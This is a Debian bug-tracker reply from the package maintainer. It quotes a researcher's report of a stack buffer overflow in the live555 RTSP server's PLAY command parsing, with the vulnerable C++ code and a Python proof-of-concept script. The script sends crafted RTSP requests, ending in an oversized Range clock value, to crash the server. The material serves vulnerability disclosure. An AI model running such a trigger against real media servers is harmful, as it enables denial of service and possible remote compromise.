Bug#964552: [Security Issue][liblivemedia] stack buffer overflow in liblivemedia

[Sebastian Ramacher <sramacher@debian.org>]

Control: tags -1 + moreinfo

Hi

On 2020-07-08 23:21:30 +0800, Xiaobo Xiang wrote:
> Package: liblivemedia
> Version: 06.25
> 
> [summary]
> In the latest version of live555 mediaserver, there is a stack based buffer
> overflow vulnerability when parsing 'PLAY' command.

Which version do you mean? The current version in Debian is 2020.01.19.
The latest upstream version is 2020.06.25. Do you mean the latter? Have
you reported this issue upstream? See http://www.live555.com/liveMedia/
for ways to contact the upstream developer.

Cheers

> 
> An attacker is able to send a sequence of malformed RTSP packets to trigger
> this issue. In the worst case, the media server running this service can be
> exploited remotely without user interaction.
> 
> [bug details]
> The bug is in function RTSPServer::RTSPClientSession::handleCmd_PLAY().
> It calls a sscanf function to get absolute start time and end time as
> strings. This is an unsafe c function that should be taken good care of.
> ```cpp
>   } else if (sscanf(paramStr, "clock = %n", &numCharsMatched3) == 0 &&
> numCharsMatched3 > 0) {
>     rangeStart = rangeEnd = 0.0;
> 
>     char const* utcTimes = &paramStr[numCharsMatched3];
>     size_t len = strlen(utcTimes) + 1;
>     char* as = new char[len];
>     char* ae = new char[len];
>     int sscanfResult = sscanf(utcTimes, "%[^-]-%[^\r\n]", as, ae);   ///
> <=== dangerous function call
>     if (sscanfResult == 2) {
>       absStartTime = as;
>       absEndTime = ae;
>     } else if (sscanfResult == 1) {
> ```
> 
> The absStartTime and absEndTime will then be filled into a buffer in the
> stack whose size is 100. While the absStart and absEnd are controllable by
> us, so it is possible to overflow the buffer in the stack.
> ```cpp
>   char buf[100];
>   ......
>   if (absStart != NULL)
>   {
>     // We're seeking by 'absolute' time:
>     if (absEnd == NULL)
>     {
>       sprintf(buf, "Range: clock=%s-\r\n", absStart);
>     }
>     else
>     {
>       sprintf(buf, "Range: clock=%s-%s\r\n", absStart, absEnd);
>     }
>     delete[] absStart;
>     delete[] absEnd;
>   }
> '''
> 
> [proof of concept]
> I've attached a python script to trigger this issue.
> 
> ```python
> import socket
> import sys,time
> 
> s = socket.socket()
> s.connect(("127.0.0.1",8554))
> 
> payload = 'OPTIONS rtsp://localhost:8554/small.ogv RTSP/1.0\r\n'
> payload += 'CSeq: 2\r\n'
> payload += 'User-Agent: ./testProgs/openRTSP (LIVE555 Streaming Media
> v2019.05.29)\r\n\r\n'
> s.send(payload)
> 
> time.sleep(0.1)
> data = s.recv(0x10000)
> print(data)
> 
> payload = 'DESCRIBE rtsp://localhost:8554/small.ogv RTSP/1.0 \r\nCSeq: 3
> \r\nUser-Agent: ./testProgs/openRTSP (LIVE555 Streaming Media v2019.05.29)
> \r\nAccep
> t: application/sdp\r\n\r\n'
> 
> s.send(payload)
> time.sleep(0.1)
> print(s.recv(0x10000))
> 
> payload = 'SETUP rtsp://127.0.0.1:8554/small.ogv/track1 RTSP/1.0\r\nCSeq:
> 4\r\nUser-Agent: ./testProgs/openRTSP (LIVE555 Streaming Media
> v2019.05.29)\r\nTra$sport: RTP/AVP;unicast;client_port=53642-53643\r\n\r\n'
> s.send(payload)
> time.sleep(0.1)
> res = s.recv(0x10000)
> print(res)
> 
> payload = 'PLAY rtsp://127.0.0.1:8554/small.ogv/track1 RTSP/1.0\r\nCSeq:
> 7\r\nUser-Agent: ./testProgs/openRTSP (LIVE555 Streaming Media
> v2019.05.29)\r\nSession: %s\r\n\r\nRange: clock =
> 0.00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000-0.01\r\n\r\n'
> % sessionId
> s.send(payload)
> time.sleep(0.1)
> print(s.recv(0x10000))
> 
> while True:
>     pass
> ```
> 
> Best Regards,
> Xiaobo Xiang

-- 
Sebastian Ramacher

Attachment: signature.asc
Description: PGP signature